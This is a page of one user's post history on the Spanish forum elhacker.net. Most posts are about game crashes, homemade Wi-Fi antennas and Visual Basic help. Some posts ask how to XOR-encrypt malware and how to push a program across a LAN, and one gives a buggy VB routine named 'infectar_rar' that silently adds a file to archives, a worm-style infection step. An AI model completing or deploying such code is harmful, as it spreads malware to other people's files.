elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
21 Noviembre 2008, 09:12  

Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8
76  Informática / Juegos y Consolas / Re: se me cuelga el counter strike, k pasa !!!!! en: 03 Abril 2007, 16:01

si esta perfecto, no lo bloquea ni el firewall ni el AV

:-\

77  Seguridad Informática / Criptografía / Que diferencia ay entre estas encriptaciones? en: 03 Abril 2007, 14:09
Hola

bien iba a encriptar un proyecto que tengo en VB cuando me encontre 3 tipos de encriptacion:

a XOR b
LEN (a) XOR b
HEX(a XOR b)

Pero tengo una duda, cual de ellas es mejor para encriptar un archivo (malware en este caso xD) y cual es la diferencia entre ellos?

y otra cosa, que diferencia ay en poner de key 100 a poner 220 por ejemplo?

saludos
78  Informática / Juegos y Consolas / Re: se me cuelga el counter strike, k pasa !!!!! en: 03 Abril 2007, 13:01

nadie sabe como arreglarlo o soy al unico que le pasa?

Puedo añadir que e probado el condition zero y me funciona asique es problema el 1.6

saludos
79  Informática / Juegos y Consolas / se me cuelga el counter strike, k pasa !!!!! en: 02 Abril 2007, 12:26

pues eso cuando intento entrar a cualquier server se que cuelga en la barrita de proceso de cargado cuando dice analizando informacion....

que pasa, como puedo solucionarlo?

saludos
80  Programación / Programación VB / puedo hacer algo con la red lan? en: 02 Abril 2007, 11:07
Hola

bueno, tengo un programa y me gustaria que se instalara en todas las Pcs de mi red lan (logicamente ejecutandolo en la pc administradora) seria posible?

aver si algien me guia un poco

saludos
81  Programación / Programación VB / Re: Como averiguo la ruta del disco duro? en: 01 Abril 2007, 23:51

bua me a venido perfecto

gracias a todos

saludos
82  Programación / Programación VB / Como averiguo la ruta del disco duro? en: 01 Abril 2007, 22:38
Hola

necesito averiguar el disco duro en el que esta instalado Windows

normalmente puede ser en C  pero si fuera por ejemplo en P k lo alamacenara en una variable

saludos
83  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 15:25
hola

que distancia viene a cojer bien echa?

saludos
84  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 14:32
hoal

dispongo de un usb wifi adapter y un alargador de usb de 3 metros  con eso podria montar una antena que fuera buena? o me recomendais montar una de las otras

saludos[sh]
85  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 11:17
hola

y que otra antena me recomendarias hacer?(que sea buena)

saludos[sh]
86  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 30 Diciembre 2006, 23:37
hola

cual pensais que es mejor antena:

patatas pringles, la de la tarrina de cds, o la de la paellera

saludos[sh]
87  Programación / Programación VB / Estaria bien este codigo? en: 12 Noviembre 2006, 22:21
ola

Private Sub search_rar()
On Error Resume Next
Dim NombreRar As String
Dim rarExit As String
rarExit = FindFirstFile("*.zip", NombreRar)
infectar_rar NombreRar.cFileName
While FindNextFile(rarExit, NombreRar)
infectar_rar NombreRar.cFileName
End Sub

Function infectar_rar(NombreRar As String)
On Error Resume Next
Dim file_exe As String
Dim winrar As String
winrar = "C:\ARCHIVOS DE PROGRAMA\WINRAR\WinRAR.exe"
Shell winrar & " -a " & NombreRar & " " & text1.text, vbHide
End Function

Queria saber si asi esta bien montado el motor de busqueda para los .rar y luego la forma de usar los resultados.

saludos[sh]
88  Programación / Programación VB / Re: Sistema de seriales en: 29 Octubre 2006, 20:09
ola

:-\  :-(   no tneia ni idea de que fuera asi.  :-X

Si no te es mucha molestia podrias ponerme un ejemplo? que si no no se por donde empezar

saludos[sh]
89  Programación / Programación VB / Sistema de seriales en: 29 Octubre 2006, 17:43
ola

tengo una duda como podria ponerle a un programa mio un sistema de seriales que para instalarlo o usarlo necesitaras introducir un serial y ese serial solo valiera 1 vez?

saludos[sh]
90  Informática / Juegos y Consolas / Error al instalar DOOM 3 falta un archivo en: 28 Octubre 2006, 10:17
ola

bueno pues el titulo lo dice todo,me falta el archivo pak000.pk4 algien lo tiene y lo podria subir o sabe donde bajarlo?.

saludos[sh]
Páginas: 1 2 3 4 5 [6] 7 8

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.